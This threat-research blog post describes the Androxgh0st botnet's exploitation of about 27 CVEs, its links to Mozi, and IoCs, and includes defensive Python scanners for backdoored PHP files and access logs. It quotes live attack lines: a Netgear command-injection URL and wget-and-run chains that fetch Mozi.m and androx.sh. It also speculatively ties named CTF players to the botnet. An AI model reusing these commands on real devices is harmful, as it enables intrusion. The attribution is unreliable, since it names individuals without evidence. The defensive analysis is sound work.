The Androxgh0st botnet, an emerging cyber threat since January 2024, has resurfaced with advanced capabilities and integration of IoT-focused Mozi payloads. Exploiting over 20 vulnerabilities in technologies like Cisco ASA, Atlassian JIRA, PHP frameworks, and IoT devices, Androxgh0st enables unauthorized access and remote code execution. Its growing sophistication includes shared infrastructure and malware persistence tactics, posing risks to global web servers and IoT networks. CloudSEK’s research highlights the botnet's operational overlap with Mozi, emphasizing the need for immediate patching and vigilant monitoring to mitigate exploitation risks.
CloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its exploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January 2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also deploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks, allowing unauthorized access and remote code execution. This clearly shows heightened activity from the botnet operators: in addition to the 3 CVEs reported earlier by CISA, they are now exploiting a wide range of web application vulnerabilities to obtain initial access. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access.
The Mozi botnet primarily spanned China, India and Albania. It targeted Netgear, Dasan and D-Link routers and MVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by Chinese law enforcement. The Mozi creators (or Chinese law enforcement, having compelled the creators’ cooperation) then distributed an update that removed the Mozi agents’ ability to connect to the outside world, leaving only a small fraction of working bots standing.
During our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi.
Now that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of web requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet.
CloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access.
1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
File Upload Form:
Appends Code to PHP Files:
This appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more persistent presence or further backdooring the application.
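The appending technique described above leaves traces that can be found from the defender's side: PHP code that sits after a file's original closing tag, decode-and-eval constructs, and the "PWN_IT" marker string the post later associates with this campaign. The following Python is an added example (it is not CloudSEK's code, nor any tool the post describes) that walks a web root and reports such files; it scans a constructed sample tree so it runs offline. The check for PHP's auto_prepend_file/auto_append_file directives, which make an extra file run around every script, is this example's own assumption about how "prepending" could be achieved; the post does not state that Androxgh0st sets them.

```python
import os
import re
import tempfile

# Marker string the article observed in Androxgh0st web requests.
MARKER = "PWN_IT"

# Calls that a backdoor appended to a PHP file typically needs.
SUSPICIOUS_CALLS = re.compile(
    r"\b(?:eval|assert|base64_decode|gzinflate|str_rot13|shell_exec|passthru|system|exec)\s*\(",
    re.I,
)

# One PHP code block: from an open tag to the next close tag or end of file.
# Heuristic only: a '?>' inside a string literal would split a block early.
PHP_BLOCK = re.compile(r"<\?(?:php\b|=)?(.*?)(?:\?>|\Z)", re.S | re.I)

# PHP directives that run an extra file before/after every script. Checking
# them is an assumption of this example; the article does not say Androxgh0st
# sets them.
INI_DIRECTIVES = re.compile(r"auto_(?:prepend|append)_file\s*=?\s*(\S+)", re.I)


def scan_php_source(src: str) -> list:
    """Return reasons a PHP source text looks backdoored (empty if clean)."""
    reasons = []
    if MARKER in src:
        reasons.append("contains PWN_IT marker")
    blocks = PHP_BLOCK.findall(src)
    if len(blocks) > 1 and SUSPICIOUS_CALLS.search(blocks[-1]):
        reasons.append("suspicious call in PHP block appended after the original closing tag")
    elif SUSPICIOUS_CALLS.search(src):
        reasons.append("suspicious eval/decode/exec call")
    return reasons


def scan_ini_text(text: str) -> list:
    """Return the targets of any auto_prepend_file / auto_append_file directives."""
    return INI_DIRECTIVES.findall(text)


def scan_webroot(root: str) -> dict:
    """Walk a web root; map each flagged file's relative path to its reasons."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            reasons = []
            if name.endswith(".php"):
                reasons = scan_php_source(text)
            elif name in (".htaccess", ".user.ini", "php.ini"):
                reasons = [f"auto_prepend/append_file points at {t}" for t in scan_ini_text(text)]
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings


def build_sample_webroot() -> str:
    """Constructed sample tree: a clean file, a backdoored file and an .htaccess."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "inc"))
    samples = {
        "index.php": '<?php echo "hello"; ?>\n',
        # Original footer with a second PHP block appended after its closing tag.
        os.path.join("inc", "footer.php"): (
            '<?php echo "footer"; ?>\n'
            '<?php /* PWN_IT */ eval(base64_decode($_POST["c"]));\n'
        ),
        ".htaccess": "php_value auto_prepend_file /tmp/.cache.php\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{rel}: {'; '.join(why)}")
```

Point `scan_webroot` at a real document root to use it; a file that is flagged only for a suspicious call still needs manual review, since legitimate plugins also call these functions, whereas a block appended after the original closing tag or a stray auto_prepend_file directive is rarely benign.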
2. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
3. Metabase GeoJSON map local file inclusion, versions x.40.0-x.40.4 (CVE-2021-41277): A local file inclusion vulnerability exists in Metabase’s GeoJSON map support. An unauthenticated, remote attacker can exploit it, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables.
4. Sophos authentication bypass vulnerability leading to RCE (CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code.
5. Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through 12.2.11, can be exploited to gain remote code execution as the oracle user.
6. OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated):
7. PHP CGI Argument Injection (CVE-2024-4577): An argument injection issue in PHP-CGI.
It is uncommon for a botnet to append a string to the end of a web request; here the appended string is “PWN_IT”, which appears to indicate a triggered action.
8. TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale.
9. GeoServer RCE Vulnerability (CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions.
10. WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution:
11. WordPress Brute-force Attacks: The botnet cycles through common administrative usernames and uses a consistent password pattern. The target URL redirects to /wp-admin/, the backend administration dashboard for WordPress sites. If authentication succeeds, the botnet gains access to critical website controls and settings.
12. Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers: http://<target-ip-address>/setup.cgi?currentsetting.htm=1. The "setup.cgi" page can then be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL:
http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
An attacker can replace the value of the cmd parameter with any command they want to run.
Now, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old vulnerability. We can also see what the injected commands are.
Injected Commands:
cmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear
The command sequence is as follows:
The downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to a network of compromised devices.
13. Unauthenticated Command Execution on GPON routers (CVE-2018-10561, CVE-2018-10562):
CVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically require login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access.
CVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed by revisiting /diag.html, allowing commands to be executed and their output retrieved.
14. Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (CVE-2022-22947) - Applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.
15. ZenTao CMS - SQL Injection (CNVD-2022-42853) - ZenTao has a SQL injection vulnerability. Attackers can exploit it to obtain sensitive database information.
16. AJ-Report Authentication Bypass and Remote Code Execution Vulnerability (CNVD-2024-15077) - The platform executes commands supplied in the value of the validationRules parameter of a POST request, letting an attacker obtain server permissions and log in to the management backend to take over the dashboard (“large screen”). A remote unauthenticated attacker can compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
17. eYouMail - Remote Code Execution (CNVD-2021-26422) - eYouMail is susceptible to a remote code execution vulnerability.
18. Leadsec VPN - Arbitrary File Read (CNVD-2021-64035) - An information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., can be exploited by an attacker to read sensitive information from arbitrary files located on the file system of the server.
19. EduSoho Arbitrary File Read Vulnerability - There is an unauthorized arbitrary file read vulnerability in the classroom-course-statistics interface of this education and training system. Through it, an attacker can read the contents of the config/parameters.yml file and obtain the secret value and database account password stored there; once the secret value is known, threat actors can use it for further attacks. It is important to note that this technology is predominantly used in China.
20. UFIDA NC BeanShell Remote Code Execution (CNVD-2021-30167) - An attacker can exploit this vulnerability to remotely execute code without authorization. It is important to note that this technology is predominantly used in China.
21. OA E-Cology LoginSSO.jsp SQL Injection (CNVD-2021-33202) - e-cology is an OA office system (used predominantly in China) built specifically for large and medium-sized enterprises that supports simultaneous office work on PC, mobile and WeChat terminals. An attacker could exploit this SQL injection vulnerability to obtain sensitive information.
22. ShopXO Download Arbitrary File Read Vulnerability (CNVD-2021-15822) - ShopXO is an open source, enterprise-level e-commerce system used predominantly in China. ShopXO has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information.
23. Weaver OA XmlRpcServlet - Arbitrary File Read (CNVD-2022-43245) - e-office is a standard collaborative mobile office platform predominantly used in China. e-office has an arbitrary file read vulnerability, which can be exploited by attackers to obtain sensitive information.
24. Ruijie Smartweb Weak Password - The Ruijie Smartweb management system (predominantly used in China) enables a guest account by default (guest/guest); an attacker can log in to the backend with it and carry out further attacks.
25. Hongjing HCM SQL injection vulnerability (CNVD-2023-08743) - An SQL injection vulnerability exists in Hongjing Human Resource Management System, using which attackers can obtain sensitive database information.
26. E-Cology V9 - SQL Injection (CNVD-2023-12632) - Ecology9 is a collaborative office system created by Panmicro for medium and large organizations. It is used predominantly in China. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
27. Ruckus Wireless Admin through 10.4 (CVE-2023-25717) - Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. Androxgh0st checks if the network device is running with default credentials, and if so, it pings the IP address 45.221.98[.]117.
Mozi Payload as a Component of Androxgh0st:
Unified Command Infrastructure:
TRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi Botnet.
Both botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs.
The number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over 500 devices have been infected.
Let’s take a closer look at the Ruckus Wireless Admin (CVE-2023-25717) exploitation by the botnet.
A reverse IP lookup on the IP address reveals two domains:
Upon looking at the passive DNS history of mgn4[.]com, we see that the domain has been rotated across multiple IP addresses in the same subnet since July 2023.
This indicates that the threat group has been using the domain for malicious activity at least since July 2023. Upon inspecting the files communicating with this domain, we found a malicious Excel file with a filename containing Mandarin characters. This phishing bait, first seen in the wild in July 2023, was used by the threat actors to target a hospital in Hong Kong. The file name translates to “Kwai Chung Hospital DO16191.xlsx” (md5: 039987db7dc1dea01547e0f3066f8d5d).
Coming back to the PHP command injection vulnerability, we noticed an uncommon string in the payload. As explained previously, by prepending and appending code, the attacker ensures their malicious file is executed every time a PHP script runs. The string “PWN_IT” is likely an indicator/flag used as part of the persistence mechanism, and we assess with high confidence that it is a name chosen by the threat actor(s) themselves.
A simple search led us to a “CTF-team” called “pwn_it”, led by user “ChenSem”.
These CTFs are hosted by “Kanxue”. Kanxue is a Chinese “developer” community, focused on “security research” and “reverse engineering” of PC, mobile, and smart devices. We can see the logo of China’s State Council on their website.
Now, this definitely piqued our interest, as it is not uncommon for CTFs held in China to involve hacking real-world targets. Recent examples have shown that CTF organizers often require participants to sign a document agreeing to several unusual terms aimed at keeping such operations covert. Here is what we observed:
1. The latest CTF played by “pwn_it” on Kanxue was in 2020, even though “ChenSem” appears to be a heavy-duty CTF player, indicated by their score of 501. Interestingly, that was around the same time the world saw heightened Mozi Botnet activity in the wild.
2. The CTF hosted by Kanxue in 2024 started in August, which is around the same time when Androxgh0st TP-link exploitation was observed in the wild.
3. “Pwn_it” has also been used as a function name in source code on multiple occasions. We noticed blogs by “V1ct0r”, who has written over 90 articles on security research and reverse engineering.
Their online portfolio is hosted on GitHub (gdufs-king.github[.]io), with Mandarin as the default language. GDUFS refers to the Guangdong University of Foreign Studies, implying that the author most likely used to be a student at a Chinese university. While no direct relationship has been established between this CTF team and the botnet, we have certainly observed that the use of the “pwn_it” string within malware and web requests is popular within this CTF team.
Example log entries to watch for:
GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx
POST /wp-login.php HTTP/1.1 log=admin&pwd=Passnext%40123456
Androxgh0st may execute commands such as:
/tmp/androx
cat /etc/rc.local
cat /etc/cron.d/*
ls -la /var/tmp
Check for unauthorized SSH keys:
cat ~/.ssh/authorized_keys
Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts.
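The Netgear setup.cgi request shown earlier and the example log entries in this section are the kind of patterns a web-server or proxy log review should flag. The following Python is an added example (not CloudSEK's code, nor a tool the post describes) that runs a small set of request signatures over constructed combined-format access-log lines: the Netgear todo=syscmd abuse, the GPON ?images authentication bypass and dest_host injection, the TP-Link country-parameter injection, a generic wget/curl-then-sh download chain (from which it extracts the download URL as an IoC), the PWN_IT marker, and repeated POSTs to wp-login.php from one source. The sample addresses are documentation ranges rather than the IoCs in the post, and the rule names and brute-force threshold are the example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined-log-style access log lines, constructed for this example.
# 203.0.113.x and 198.51.100.x are documentation ranges, not the IoCs in the
# article; the request shapes mirror the patterns the article describes.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Nov/2024:10:01:02 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;+wget+http://198.51.100.7:44999/Mozi.m+-O+/tmp/netgear;+sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 200 512
203.0.113.11 - - [12/Nov/2024:10:01:05 +0000] "GET /menu.html?images/ HTTP/1.1" 200 2048
203.0.113.11 - - [12/Nov/2024:10:01:06 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 120
203.0.113.12 - - [12/Nov/2024:10:02:00 +0000] "GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://198.51.100.7/androx.sh+-O+/tmp/androx;sh+/tmp/androx HTTP/1.1" 200 77
203.0.113.13 - - [12/Nov/2024:10:03:00 +0000] "GET /index.php?page=home&PWN_IT HTTP/1.1" 200 3000
203.0.113.14 - - [12/Nov/2024:10:04:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4100
203.0.113.14 - - [12/Nov/2024:10:04:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4100
203.0.113.14 - - [12/Nov/2024:10:04:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4100
203.0.113.14 - - [12/Nov/2024:10:04:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4100
203.0.113.14 - - [12/Nov/2024:10:04:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4100
198.51.100.20 - - [12/Nov/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) HTTP/[\d.]+" (\d{3}) (?:\d+|-)')

# Request-level signatures, matched against the URL-decoded request target.
RULES = [
    ("netgear-setup.cgi-syscmd", re.compile(r"/setup\.cgi\?.*todo=syscmd", re.I)),
    ("gpon-auth-bypass", re.compile(r"\?images/?(?:$|&)", re.I)),
    ("gpon-diag-cmdinj", re.compile(r"/GponForm/diag_Form\b.*dest_host=[^&]*[;|`$]", re.I)),
    ("tplink-locale-country-cmdinj", re.compile(r"/cgi-bin/luci;stok=/locale\?.*country=[^&]*[;|`$]", re.I)),
    # Fetch a payload with wget/curl, then hand it to a shell in the same command line.
    ("download-and-run-chain", re.compile(r"(?:wget|curl)\s+\S*https?://\S+.*?(?:;|&&|\|\|?)\s*(?:sh|bash)\b", re.I | re.S)),
    ("pwn_it-marker", re.compile(r"PWN_IT")),
]
# Download URLs embedded in a request are the IoCs worth pulling out.
IOC_URL = re.compile(r"https?://[^\s;&|'\"<>]+")


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    return {"src": src, "ts": ts, "method": method, "target": target,
            "status": status, "decoded": unquote_plus(target)}


def detect(log_text: str, bruteforce_threshold: int = 5) -> list:
    """Run the signatures and the wp-login counter over a log; return alerts."""
    alerts = []
    wp_login_posts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        urls = IOC_URL.findall(rec["decoded"])
        for name, rx in RULES:
            if rx.search(rec["decoded"]):
                alerts.append({"src": rec["src"], "ts": rec["ts"], "rule": name,
                               "request": rec["target"], "ioc_urls": urls})
        # Credential brute force: many POSTs to wp-login.php from one source.
        if rec["method"] == "POST" and rec["target"].startswith("/wp-login.php"):
            wp_login_posts[rec["src"]] += 1
            if wp_login_posts[rec["src"]] == bruteforce_threshold:
                alerts.append({"src": rec["src"], "ts": rec["ts"], "rule": "wp-login-bruteforce",
                               "request": rec["target"], "ioc_urls": []})
    return alerts


def extract_iocs(alerts: list) -> set:
    """Collect the payload download URLs seen across all alerts."""
    return {u for a in alerts for u in a["ioc_urls"]}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['src']} {a['rule']} {a['request']}")
    print("download IoCs:", sorted(extract_iocs(found)))
```

Feed it a real access log via `detect(open(path).read())`. A production version would add a time window to the brute-force counter, decode nested URL encoding before matching, and treat the download URLs it extracts as candidates for blocking at the egress proxy, since the device fetching Mozi.m or a shell script over HTTP from an unknown host is the step that turns an exploit attempt into an infection.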
Request Logger and Command Sender - Androxgh0st
TP Link Router Exploitation - Download servers
Geoserver Exploitation - Download servers
Netgear Router Exploitation - Download server
GPON Router Exploitation - Download server
Ruckus Wireless Admin (CVE-2023-25717)
File Hashes - Androxgh0st TP-Link Exploitation (md5)
File Hashes - Androxgh0st Geoserver Exploitation (md5)